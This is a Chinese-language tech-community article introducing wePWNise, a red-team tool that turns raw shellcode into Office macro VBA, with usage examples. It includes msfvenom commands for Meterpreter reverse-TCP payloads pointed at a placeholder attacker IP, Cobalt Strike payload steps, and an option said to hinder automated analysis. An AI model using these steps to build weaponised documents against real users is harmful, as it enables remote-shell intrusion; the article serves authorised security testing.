前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >wePWNise:一款功能强大的红队Office宏VBA代码生成工具

wePWNise:一款功能强大的红队Office宏VBA代码生成工具

作者头像
FB客服
发布2024-05-17 16:40:48
750
发布2024-05-17 16:40:48
举报
文章被收录于专栏:FreeBufFreeBuf
关于wePWNise

wePWNise是一款功能强大的Office宏VBA代码生成工具,该工具基于纯Python开发,可以帮助广大研究人员生成用于Office宏或模版的VBA代码,并以此来测试目标Office环境、应用程序控制和防护机制的安全性。

wePWNise的设计理念将自动化和集成考虑在内,能够以锁定的环境场景为目标。wePWNise能够枚举目标环境的软件限制策略(SRP)和EMET缓解措施,并支持动态识别要将注入Payload的安全二进制文件。除此之外,wePWNise还集成了现有的开发框架(例如Metasploit、Cobalt Strike),并接受原始格式的任何定制Payload,以供红队研究人员使用。

工具运行流程

工具要求

Python termcolor包

安装命令如下:

代码语言:javascript
复制
pip install termcolor

工具下载

由于该工具基于Python 2开发,因此我们首先需要在本地设备上安装并配置好Python 2.7版本环境。

接下来,广大研究人员可以直接使用下列命令将该项目源码克隆至本地:

代码语言:javascript
复制
git clone https://github.com/FSecureLABS/wePWNise.git

命令行参数

代码语言:javascript
复制
usage: wepwnise.py [-h] -i86 <x86_shellcode> -i64 <x64_shellcode> [--inject64]   

                   [--out <output_file>] [--msgbox] [--msg <window_message>]



optional arguments:   

  -h, --help                      显示工具帮助信息和退出   

  -i86 <x86_shellcode>            输入x86原始shellcode   

  -i64 <x64_shellcode>            输入x64原始shellcode   

  --inject64                  注入64位Payload,注入x86时设置为False,默认为True   

  --out <output_file>             输出VBA宏的文件路径  

  --msgbox                        显示消息框以防止自动化分析,默认为True  

  --msg <window_message>          --msgbox设置为True时,需要显示的自定义提示消息


工具使用样例



Metasploit Payload

首先,生成适用于x86和x64架构的原始格式Payload,并确保Metasploit监听器配置正确:

代码语言:javascript
复制
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -o /payloads/msf86.raw

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -a x86_64 -o /payloads/msf64.raw

然后将wePWNise指向生成的Payload,并将输出结果存储至msf_wepwn.txt:

代码语言:javascript
复制
$ wepwnise.py -i86 /payloads/msf86.raw  -i64 /payloads/msf64.raw --out /payloads/msf_wepwn.txt
代码语言:javascript
复制

Cobalt Strike Payload

按照下列路径点击菜单,并在Cobalt Strike中生成原始Payload,然后重复该操作并勾选x64勾选框以生成64位Payload:

代码语言:javascript
复制
Attacks > Packages > Payload Generator

然后将生成的Payload传递给wePWNise并生成VBA代码:

代码语言:javascript
复制
$ wepwnise.py -i86 /payloads/cs86.raw  -i64 /payloads/cs64.raw  --msgbox False --out /payloads/cs_wepwn.txt
代码语言:javascript
复制
自定义Payload

在某些特定场景下,我们可能只能拿到x86 Payload,而wePWNise需要32位和64位两种架构的Payload,为了禁用64位注入功能,我们可以创建一个虚假的64位文件,然后将--inject64参数设置为False:

代码语言:javascript
复制
$ echo "+" > /payloads/dummy64.raw

$ wepwnise.py -i86 /payloads/custom.raw  -i64 /payloads/dummy64.raw --inject64 False --out /payloads/wepwn86.txt


类似的,如果你只想要生成64位的Payload,可以创建一个虚假的x86文件,然后通过-i86命令行参数提供给wePWNise。



许可证协议

本项目的开发与发布遵循BSD-3-Clause开源许可证协议。

项目地址

wePWNise:

https://github.com/FSecureLABS/wePWNise

https://labs.mwrinfosecurity.com/tools/wepwnise/ https://mwrinfosecurity.com/

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2024-05-09,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • Metasploit Payload
  • Cobalt Strike Payload
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档